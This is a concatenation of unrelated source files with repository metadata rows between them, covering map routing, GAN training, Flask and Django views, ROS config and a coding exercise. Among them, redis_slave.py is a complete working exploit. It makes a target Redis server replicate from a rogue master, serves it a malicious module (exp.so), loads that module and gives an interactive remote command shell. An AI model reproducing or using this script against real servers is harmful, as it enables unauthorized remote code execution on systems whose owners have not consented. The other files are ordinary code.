        elif self.edge_nodes_ids[-1] == start_node_id:
            self.direction = DIRECTION.BACKWARD
        else:
            self.direction = DIRECTION.NONE

    def is_location_in_bbox(self, location_rad):
        """Indicates if a given location is contained in the bounding box surrounding the way.
        self.bbox = [[min_lat, min_lon], [max_lat, max_lon]]
        """
        is_g = np.greater_equal(location_rad, self.bbox[0, :])
        is_l = np.less_equal(location_rad, self.bbox[1, :])
        return np.all(np.concatenate((is_g, is_l)))

    @property
    def speed_limit(self):
        """Speed limit in m/s for the current travel direction; 0. when unknown. Cached."""
        if self._speed_limit is not None:
            return self._speed_limit
        # Get string from corresponding tag, consider conditional limits first.
        limit_string = self.way.tags.get("maxspeed:conditional")
        if limit_string is None:
            if self.direction == DIRECTION.FORWARD:
                limit_string = self.way.tags.get("maxspeed:forward:conditional")
            elif self.direction == DIRECTION.BACKWARD:
                limit_string = self.way.tags.get("maxspeed:backward:conditional")
        limit = conditional_speed_limit_for_osm_tag_limit_string(limit_string)
        # When no conditional limit set, attempt to get from regular speed limit tags.
        if limit == 0.:
            limit_string = self.way.tags.get("maxspeed")
            if limit_string is None:
                if self.direction == DIRECTION.FORWARD:
                    limit_string = self.way.tags.get("maxspeed:forward")
                elif self.direction == DIRECTION.BACKWARD:
                    limit_string = self.way.tags.get("maxspeed:backward")
            limit = speed_limit_for_osm_tag_limit_string(limit_string)
        self._speed_limit = limit
        return self._speed_limit

    @property
    def active_bearing_delta(self):
        """Returns the sine of the delta between the current location bearing and the exact
        bearing of the portion of way we are currentluy located at.
        """
        return self._active_bearing_delta

    @property
    def is_one_way(self):
        # Motorways are implicitly one-way even without an explicit tag.
        return self._one_way in ['yes'] or self.highway_type in ["motorway"]

    @property
    def is_prohibited(self):
        """True when travel in the current direction is not allowed on this way."""
        # Direction must be defined to asses this property. Default to `True` if not.
        if self.direction == DIRECTION.NONE:
            return True
        return self.is_one_way and self.direction == DIRECTION.BACKWARD

    @property
    def distance_to_way(self):
        """Returns the perpendicular (i.e. minimum) distance between current location and the way
        """
        return self._distance_to_way

    @property
    def node_ahead(self):
        # Node the vehicle is driving towards; None when not located on the way.
        return self.way.nodes[self.ahead_idx] if self.ahead_idx is not None else None

    @property
    def last_node(self):
        """Returns the last node on the way considering the traveling direction
        """
        if self.direction == DIRECTION.FORWARD:
            return self.way.nodes[-1]
        if self.direction == DIRECTION.BACKWARD:
            return self.way.nodes[0]
        return None

    @property
    def last_node_coordinates(self):
        """Returns the coordinates for the last node on the way considering the traveling direction. (in radians)
        """
        if self.direction == DIRECTION.FORWARD:
            return self._nodes_np[-1]
        if self.direction == DIRECTION.BACKWARD:
            return self._nodes_np[0]
        return None

    def node_before_edge_coordinates(self, node_id):
        """Returns the coordinates of the node before the edge node identified with `node_id`. (in radians)
        """
        if self.edge_nodes_ids[0] == node_id:
            return self._nodes_np[1]
        if self.edge_nodes_ids[-1] == node_id:
            return self._nodes_np[-2]
        # `node_id` is not an edge node of this way.
        return np.array([0., 0.])

    def split(self, node_id, way_ids=None):
        """ Returns and array with the way relations resulting from spliting the current way relation at node_id
        """
        idxs = np.nonzero(self._nodes_ids == node_id)[0]
        if len(idxs) == 0:
            return []
        idx = idxs[0]
        # Splitting at an edge node is a no-op: the way stays whole.
        if idx == 0 or idx == len(self._nodes_ids) - 1:
            return [self]
        if not isinstance(way_ids, list):
            way_ids = [-1, -2]  # Default id values.
        # The split node belongs to both resulting ways.
        ways = [create_way(way_ids[0], node_ids=self._nodes_ids[:idx + 1], from_way=self.way),
                create_way(way_ids[1], node_ids=self._nodes_ids[idx:], from_way=self.way)]
        return [WayRelation(way, parent=self) for way in ways]
| [
"dgnpilot@gmail.com"
] | dgnpilot@gmail.com |
5160df22bf339592d41b4ff90b972fa65bcbcd93 | 773c02448ad1766270583cadcbb5c2c71347efd2 | /T2_img2latent.py | 0a200f93eb514a9c131e57b12e6605ca580d353a | [] | no_license | thoppe/SyntheticCountenance | b4640c8009ba5bc2377a11aac88cc1be75d7b92c | c06e186fb0596a50d9080b38b80d81c58f2bdde4 | refs/heads/master | 2020-04-14T19:36:12.431157 | 2019-02-02T22:05:20 | 2019-02-02T22:05:20 | 164,064,092 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | """
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
    # Infinite generator yielding (latent batch Z, image batch) pairs sampled
    # uniformly at random from the pre-rendered PGAN sample set.
    f_h5 = 'samples/PGAN_small_images.h5'
    with h5py.File(f_h5, 'r') as h5:
        N = len(h5['Z'])
        # Latents are small enough to load fully into memory up front.
        Z = h5['Z'][...]
        # NOTE(review): the loop must stay inside the `with` block so the HDF5
        # file remains open while images are read lazily per batch — confirm.
        while True:
            idx = np.random.randint(0, N, size=batch_size)
            img = np.array([h5['IMG'][i] for i in idx])
            # Convert RGB images to the GAN's expected output representation.
            img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
            yield Z[idx], img
if __name__ == "__main__":
    batch_size = 32
    n_epochs = 2000  # NOTE(review): defined but never used below — confirm intent
    n_save_every = 50
    ITR = image_pipeline(batch_size)
    clf = Image2Latent(batch_size=batch_size)
    # Train indefinitely, rendering progress every `n_save_every` batches.
    while True:
        for n, (z,img) in enumerate(ITR):
            if n%n_save_every == 0:
                clf.render(z, img)
                #s = clf.save()
            lx = clf.train(z, img)
            print(n, lx)
| [
"travis.hoppe@gmail.com"
] | travis.hoppe@gmail.com |
7fdf36763e8df784414735157463d4c018fde93b | ee6316029d2f09a01a1ea35a671d9bbf9f0597f6 | /webapp/home/controllers.py | cf58747d8bac3f4a275b861c7b9c1c57d47a2ff6 | [] | no_license | Eih3/flandria | fa7d2d9501642283e1831089107e17df56f453b1 | 59fd3bcb94e3070c2a60ab5e9997ae0f035b25e5 | refs/heads/master | 2020-05-17T19:16:45.268665 | 2019-04-28T13:13:34 | 2019-04-28T13:13:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | from flask import Blueprint, render_template, send_from_directory, request, url_for, current_app, make_response, redirect
home = Blueprint("home", __name__)


@home.route("/")
def index():
    """Render the landing page."""
    return render_template("home/index.html", title="Home")
@home.route("/language/<language_code>")
def set_language(language_code):
    """Persist the chosen language in a cookie, then redirect back.

    Redirects to the `url` query parameter when given, otherwise to the
    home page.
    """
    target = request.args.get("url") or url_for("home.index")
    resp = make_response(redirect(target))
    # Remember the language choice for one year.
    resp.set_cookie('flandria-language', language_code, max_age=60*60*24*365*1)
    return resp
@home.route('/robots.txt')
def robots_txt():
    """Serve the static robots.txt; request.path[1:] strips the leading slash."""
    return send_from_directory(current_app.static_folder, request.path[1:])
@home.route('/sitemap.xml')
def sitemap_xml():
    """Serve the static sitemap.xml; request.path[1:] strips the leading slash."""
    return send_from_directory(current_app.static_folder, request.path[1:])
| [
"jeremyregitz@gmail.com"
] | jeremyregitz@gmail.com |
2dff5884c1274d573e0df7ee5b14c4d608ba9edc | c33e2687611ed31435230fec97e19af9216fbcc0 | /經典題庫百題/分類題庫/APCS考古題/201810/1.運動明星.py | 2b67d8a4741e443f923e12d2ae112151b63a47dd | [] | no_license | jiangsir/107-HighSchoolPython | e44ff5ee6d4c0468c789fb126b9da174b437448c | a04634de9866d16f3805a2e724766647de67eeab | refs/heads/master | 2020-04-13T17:29:01.249234 | 2019-06-14T08:41:05 | 2019-06-14T08:41:05 | 163,349,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | '''
'''
T = int(input())
total = 0
count = 0
for _ in range(T):
moneys = [int(x) for x in input().split()]
rank = moneys[0]
total += moneys[rank]
if moneys[rank] == max(moneys[1:]):
count += 1
print(total)
print(count)
| [
"jiangzero@gmail.com"
] | jiangzero@gmail.com |
a29d78349416b6ce7925ab1bea134ec5c5290a40 | fe9935b08e22fc019fbcfd6c0bc37ab235e2a0e2 | /catkin_ws/build/turtlebot3/turtlebot3_slam/catkin_generated/pkg.installspace.context.pc.py | 2b3adfe705c7cb5a2de1c3879540eba77759f080 | [] | no_license | abdussametkaradeniz/RosLessonsAndTutorials | ce22a06d8a881d949479956ea6aa06ff9f8bf41b | 940597350f5ed85244696ec44fe567fd89a6d5d8 | refs/heads/main | 2023-07-18T22:56:52.075918 | 2021-09-07T21:42:24 | 2021-09-07T21:42:24 | 404,125,607 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_slam"
PROJECT_SPACE_DIR = "/home/ardentblaze/catkin_ws/install"
PROJECT_VERSION = "1.2.5"
| [
"abdussametgosukaradeniz@gmail.com"
] | abdussametgosukaradeniz@gmail.com |
5ebfcdfcba4b166ff16cfa28afc5687acc95fbcb | a0ad15548b2fd2567e12d8cb45cc78f0b638aa5f | /zello_backend/services/blog_record.py | b26d44302d79200ad0ed8966de21d83d603c1693 | [] | no_license | sam7sa/zello_backend | 1c8c9a013cd895d820fd9b8349e7d639f950999a | e3e360d8b80f9c6a1c29e15c175d0e8867e93ce5 | refs/heads/master | 2021-05-31T11:26:03.895740 | 2016-06-15T16:35:41 | 2016-06-15T16:35:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | import sqlalchemy as sa
from paginate_sqlalchemy import SqlalchemyOrmPage
from ..models.blog_record import BlogRecord
class BlogRecordService(object):
    """Query helpers for BlogRecord entries."""

    @classmethod
    def all(cls, request):
        """Return a query over all records, newest first."""
        return (request.dbsession.query(BlogRecord)
                .order_by(sa.desc(BlogRecord.created)))

    @classmethod
    def by_id(cls, _id, request):
        """Fetch a single record by primary key (None when absent)."""
        return request.dbsession.query(BlogRecord).get(_id)

    @classmethod
    def get_paginator(cls, request, page=1):
        """Return a paginator over all records, newest first, 5 per page."""
        records = (request.dbsession.query(BlogRecord)
                   .order_by(sa.desc(BlogRecord.created)))
        query_params = request.GET.mixed()

        def url_maker(link_page):
            # Preserve the existing query string, swapping in the page number.
            query_params['page'] = link_page
            return request.current_route_url(_query=query_params)

        return SqlalchemyOrmPage(records, page, items_per_page=5,
                                 url_maker=url_maker)
| [
"maxim@aeromultimedia.com"
] | maxim@aeromultimedia.com |
6f37df072fb635de324185e8ce476a777756d4a5 | e287ee0313dd611e54f607fe74c1851a88de7ca2 | /tuites/templatetags/tuites_likes.py | 31197b869258bffa49e48bd81034626976bf444a | [] | no_license | gabrielaleal/tuirer-django | 65159f346dd6aac992223e25a546a1b7b2b896d7 | 78d3ae72c20b05a2b706c922361c52fda326a002 | refs/heads/master | 2022-12-11T02:17:13.892559 | 2018-08-07T13:38:47 | 2018-08-07T13:38:47 | 143,877,400 | 0 | 0 | null | 2022-12-08T02:24:04 | 2018-08-07T13:30:43 | Python | UTF-8 | Python | false | false | 440 | py | from django import template
from django.utils.html import format_html
register = template.Library()


@register.simple_tag(takes_context=True)
def tuite_liked_icon(context):
    """Render a filled heart when the current user has liked the tuite,
    an outlined heart otherwise.
    """
    user = context.get('user')
    tuite = context.get('tuite')
    if tuite.liked_by.filter(pk=user.pk).exists():
        return format_html('<i class="fas fa-heart"></i>')
    return format_html('<i class="far fa-heart"></i>')
"gabriela.leal@hotmail.com"
] | gabriela.leal@hotmail.com |
d55b068d06b5073e94e8d8d64ef02644c79a1ee1 | 1a41588142adebdee4176576f9260c511af4e88a | /account/admin.py | 34f6e94bbe1a4c0d79a90fda6d2b3444141842b2 | [] | no_license | ogzurd/django-new | 7a2cbd915d2dfe070b62f0ab389f1321fe1bd397 | e5dfa36479bd5cae154853c310d834144c3cd210 | refs/heads/master | 2023-05-13T23:13:57.707677 | 2021-05-25T20:46:02 | 2021-05-25T20:46:02 | 358,844,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import CustomUserModel
@admin.register(CustomUserModel) # decorator registers the model, replacing an explicit admin.site.register() call
class CustomAdmin(UserAdmin):
    """Admin for the custom user model; adds an avatar editing section."""
    list_display =(
        'username', 'email'
    )
    # Extend the stock UserAdmin form with an avatar field section.
    fieldsets = UserAdmin.fieldsets + (
        ('Avatar Değiştirme Alanı', {
            'fields' : ['avatar']
        }),
    )
| [
"ogzurd@icloud.com"
] | ogzurd@icloud.com |
c639300afde098f8880ea4f170b16a2aa369d28c | 0f90bc3f68e674b2a71d940167b9d5702d18d8ba | /finalProject/env/lib/python3.6/abc.py | d3583e61a4a85959762a2d51fc07cc3be07470ea | [] | no_license | pondjames007/DetourningTheWeb | a0f0d730365097b2233c2b9e6ccac0bcc7c113e4 | 49aea061bea449b016eb7b35ff5489c35654dd28 | refs/heads/master | 2021-05-04T05:40:39.881902 | 2018-04-23T20:44:43 | 2018-04-23T20:44:43 | 120,343,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /Users/pondjames007/anaconda3/lib/python3.6/abc.py | [
"jameshuang@nyu.edu"
] | jameshuang@nyu.edu |
a77614658ec70f767df7385b6cddebc9026d26de | 7ba16672759e06be70433beb83514051220e20f0 | /Redis/EXP/redis_slave.py | acb3e70f5352d45275fdae11cfc72b4e9018be35 | [] | no_license | ananaskr/Escalation_Database | 6b0747d67659a8ba281f20519f5e62375989640f | 2ae9ce1e5500505df019097477c6a40db4a41183 | refs/heads/master | 2022-04-29T00:33:57.618777 | 2020-04-30T07:59:39 | 2020-04-30T07:59:39 | 256,658,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,964 | py | import socket
import time
CRLF = "\r\n"
payload = open("exp.so","rb").read()
exp_filename = "exp.so"
def redis_format(arr):
    """Encode a space-separated command string as a RESP array.

    Each whitespace-delimited token becomes one bulk string:
    "PING" -> "*1\r\n$4\r\nPING\r\n".

    The original declared ``global payload`` without using it and relied on
    the module-level CRLF constant; the terminator is now local so the
    function is self-contained.
    """
    crlf = "\r\n"
    parts = arr.split(" ")
    # RESP array header: "*<element count>"
    cmd = "*" + str(len(parts))
    for part in parts:
        # each element: "$<byte length>" CRLF <payload>
        cmd += crlf + "$" + str(len(part)) + crlf + part
    cmd += crlf
    return cmd
def redis_connect(shost,sport):
    """Open a plain TCP connection to the target Redis server and return the socket."""
    sock = socket.socket()
    sock.connect((shost,sport))
    return sock
def send(sock,cmd):
    """RESP-encode *cmd*, send it over *sock*, and print the decoded reply."""
    sock.send(redis_format(cmd).encode())
    print(sock.recv(1024).decode("utf-8"))
def interact_shell(sock):
    """Interactive loop: read shell commands from stdin and execute them on the
    Redis server through the loaded module's ``system.exec`` command.

    Type "exit" or "quit" (or press Ctrl-C) to leave the loop.
    """
    flag = True
    try:
        while flag:
            shell = input("\033[1;32;40m[*]\033[0m ")
            # ${IFS} replaces spaces so the whole command survives as one token
            shell = shell.replace(" ","${IFS}")
            if shell == "exit" or shell == "quit":
                flag = False
            else:
                send(sock,"system.exec {}".format(shell))
    except KeyboardInterrupt:
        return
def RogueServer(mport):
    """Minimal rogue Redis master.

    Listens on *mport*, answers the replication handshake from the victim
    slave (PING -> +PONG, REPLCONF -> +OK), and on PSYNC/SYNC serves the
    module-level *payload* (exp.so) as the body of a FULLRESYNC so the
    slave writes it to disk as its "RDB" dump. Returns after the payload
    has been sent.
    """
    global CRLF
    global payload
    flag = True
    result = ""
    sock = socket.socket()
    sock.bind(("0.0.0.0", mport))
    sock.listen(10)
    clientSock, address = sock.accept()
    while flag:
        data = clientSock.recv(1024).decode("utf-8")
        if "PING" in data:
            result = "+PONG"+CRLF
            clientSock.send(result.encode())
            flag = True
        elif "REPLCONF" in data:
            result = "+OK"+CRLF
            clientSock.send(result.encode())
            flag = True
        elif "PSYNC" in data or "SYNC" in data:
            # fake full resync: 40-char replication id, then the payload
            # framed like a bulk string ("$<len>") in place of an RDB dump
            result = "+FULLRESYNC "+"a"*40+" 1"+CRLF
            result += "$"+str(len(payload))+CRLF
            result = result.encode()
            result += payload
            result += CRLF.encode()
            clientSock.send(result)
            flag = False
if __name__ == "__main__":
    # attacker-side rogue master address (mhost/mport) and victim Redis (shost/sport)
    mhost = "docker.for.mac.host.internal"
    mport = 6380
    shost = "127.0.0.1"
    sport = 6379
    passwd = ""
    redis_sock = redis_connect(shost,sport)
    if passwd:
        send(redis_sock,"AUTH {}".format(passwd))
    # point the victim at our rogue master and name the dump file exp.so
    send(redis_sock,"SLAVEOF {} {}".format(mhost,mport))
    send(redis_sock,"config set dbfilename {}".format(exp_filename))
    time.sleep(2)
    # serve the payload to the replicating victim, then load it as a module
    RogueServer(mport)
    send(redis_sock,"MODULE LOAD ./{}".format(exp_filename))
    interact_shell(redis_sock)
"952634605@qq.com"
] | 952634605@qq.com |
e4e7c3cf651a5d449910e59add06288672f63fb1 | 5a170f40d824e57c6053b0d645ec0d6737cb40c5 | /Prac_01/cp1404 prac1,2.py | c6a9efee241389821530cf167884416c3ee34529 | [] | no_license | izacWL/Cp1404Practicals | 271fbe780b14234778bb284aef09f7a32ba2b179 | 76aa654012b479672182ebea530426cc5968c78e | refs/heads/master | 2020-03-28T03:01:26.142836 | 2018-09-06T04:34:48 | 2018-09-06T04:34:48 | 147,613,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | for i in range(1, 21, 2):
print(i,end='')
print() | [
"noreply@github.com"
] | izacWL.noreply@github.com |
63ee12c3e6436cfb5389b5fbb0a6b092d87c6fe5 | acbd075e7f409cd172cba62afbced0c42ce53eae | /Website/DMA/DMA/wsgi.py | 5d4d02307c06d649bc0ab96983dffc44b45d6f65 | [] | no_license | IlhanKalkan/dankmemes | 481046cd79ac4f25792b21da159597088b6dfdeb | 3ce4f47b315c91dc6c918dcf007c1d73b1d668bc | refs/heads/master | 2022-03-06T04:45:36.458069 | 2019-11-02T17:15:54 | 2019-11-02T17:15:54 | 168,574,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
WSGI config for DMA project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DMA.settings')
application = get_wsgi_application()
| [
"i.d.kalkan@students.uu.nl"
] | i.d.kalkan@students.uu.nl |
ff3d5d905ae36e67b425df5f85793c95d78e9187 | 28c75a57ed4fc0e84c69cfe36a0170ec50315dd8 | /server/apps/api/migrations/0018_auto_20200501_0942.py | 6d599721c8901d4310f8163a797dc35633adcd83 | [] | no_license | mskwon1/capstone-2020-21 | 441adf511b9592366c5dd620d764fd76a9cfd129 | e1929401326401a81363ec3997c84caecb618207 | refs/heads/master | 2022-08-24T20:45:46.946606 | 2020-05-25T10:00:54 | 2020-05-25T10:00:54 | 266,690,423 | 1 | 0 | null | 2020-05-25T05:24:17 | 2020-05-25T05:24:17 | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.4 on 2020-05-01 09:42
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: change Weather.precipitation to a FloatField."""

    dependencies = [
        ('api', '0017_auto_20200430_2344'),
    ]

    operations = [
        migrations.AlterField(
            model_name='weather',
            name='precipitation',
            field=models.FloatField(),
        ),
    ]
| [
"mageeeeek@gmail.com"
] | mageeeeek@gmail.com |
83c5bdc03f15bf3062de8e162dc37d0640411c79 | 71c7683331a9037fda7254b3a7b1ffddd6a4c4c8 | /Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py | c5a03c629416915abae29c06369469f6b4fd23be | [] | no_license | pseyfert-cern-gitlab-backup/Urania | edc58ba4271089e55900f8bb4a5909e9e9c12d35 | 1b1c353ed5f1b45b3605990f60f49881b9785efd | refs/heads/master | 2021-05-18T13:33:22.732970 | 2017-12-15T14:42:04 | 2017-12-15T14:42:04 | 251,259,622 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### masage a bit the expression to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
if ape==ak: continue
if a_s==ak: continue
_re, _im = TermsAsReImag(A,ak,ape)
pdf_delete[re(ak*ape.conjugate())]=_re
pdf_delete[im(ak*ape.conjugate())]=_im
pdf_delete[re(ape*ak.conjugate())]=_re
pdf_delete[im(ape*ak.conjugate())]=_im
phys = 0
for key in pdf_split:
if key in pdf_delete.keys():
print "deleting ",key
continue
phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
    """Rewrite *function* in terms of the fit variables x, y, z.

    Double-angle terms are expanded first, sines are replaced by
    sqrt(1 - cos^2), and finally cos(ThetaK) -> x, cos(ThetaL) -> y,
    Phi -> z (the module-level sympy symbols defined above).
    """
    function = function.subs( Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK) )
    function = function.subs( Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2)
    function = function.subs( Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL) )
    function = function.subs( Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2)
    function = function.subs( Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2))
    function = function.subs( Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2))
    function = function.subs([(CThK,x),(CThL,y), (Phi,z)])
    return function
func = changeFreeVars(phys)
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
### tree - mix of B & Bbar
### tree1 - K+
### tree2 - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
    """Fit *model* to the module-level dataset and draw the three angular
    projections (cos ThetaK, cos ThetaL, Phi) on canvas *cv*.

    Returns the fit result plus the three RooPlot frames (returned so the
    caller keeps them alive and ROOT does not garbage-collect the plots).
    """
    res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
    cv.Divide(2,2)
    cv.cd(1)
    Angframe = CThetaK.frame()
    data.plotOn(Angframe)
    model.plotOn(Angframe)
    Angframe.Draw()
    cv.cd(2)
    Angframeb = CThetaL.frame()
    data.plotOn(Angframeb)
    model.plotOn(Angframeb)
    Angframeb.Draw()
    cv.cd(3)
    Angframec = Phi.frame()
    data.plotOn(Angframec)
    model.plotOn(Angframec)
    Angframec.Draw()
    return res, Angframe, Angframeb, Angframec
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
| [
"liblhcb@cern.ch"
] | liblhcb@cern.ch |
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42 | 989b3499948137f57f14be8b2c77d0610d5975e6 | /python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py | 978209ab4157d0feb585ee846dc3b32fb9719737 | [] | no_license | namkiseung/python_BasicProject | 76b4c070934ad4cb9d16ce844efa05f64fb09ac0 | 460d05248b2d1431624aba960e28bece888643e4 | refs/heads/master | 2022-12-13T21:12:06.865241 | 2020-04-23T01:30:08 | 2020-04-23T01:30:08 | 142,980,920 | 1 | 1 | null | 2022-12-08T02:27:40 | 2018-07-31T07:49:17 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
def five_seven(x, y):
    """Return the numbers in [x, y] (both bounds inclusive) that are divisible
    by both 7 and 5, joined into a single comma-separated string.

    sample in/out:
        five_seven(1500, 1600) -> "1505, 1540, 1575"
        five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"

    The original printed matches, overwrote `result` with a tuple each
    iteration, and returned the literal 'success' -- it never produced the
    documented string. Divisible by both 5 and 7 <=> divisible by 35.
    """
    return ", ".join(str(num) for num in range(x, y + 1) if num % 35 == 0)
if __name__ == "__main__":
print five_seven(1500, 1600)
print five_seven(1500, 1700)
pass
| [
"rlzld100@gmail.com"
] | rlzld100@gmail.com |
324726703696a02fc63bb3ddb69a8b98bf17fbba | b5f5c062a76a396a38165f98c69780670d19a276 | /tark/genenames/models.py | 2141535ec169e3e1404d2b500580cc0163e5b9fa | [
"Apache-2.0"
] | permissive | nerdstrike/tark | 6c6120231a0002cfa160814469ab4ec92bdb3acc | 8b2e4d085abbff7863409e8b4f52c8d203a5c5b6 | refs/heads/master | 2020-12-06T20:22:36.271790 | 2020-01-08T11:10:39 | 2020-01-08T11:10:39 | 232,545,097 | 0 | 0 | Apache-2.0 | 2020-01-08T11:09:59 | 2020-01-08T11:09:59 | null | UTF-8 | Python | false | false | 1,262 | py | """
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
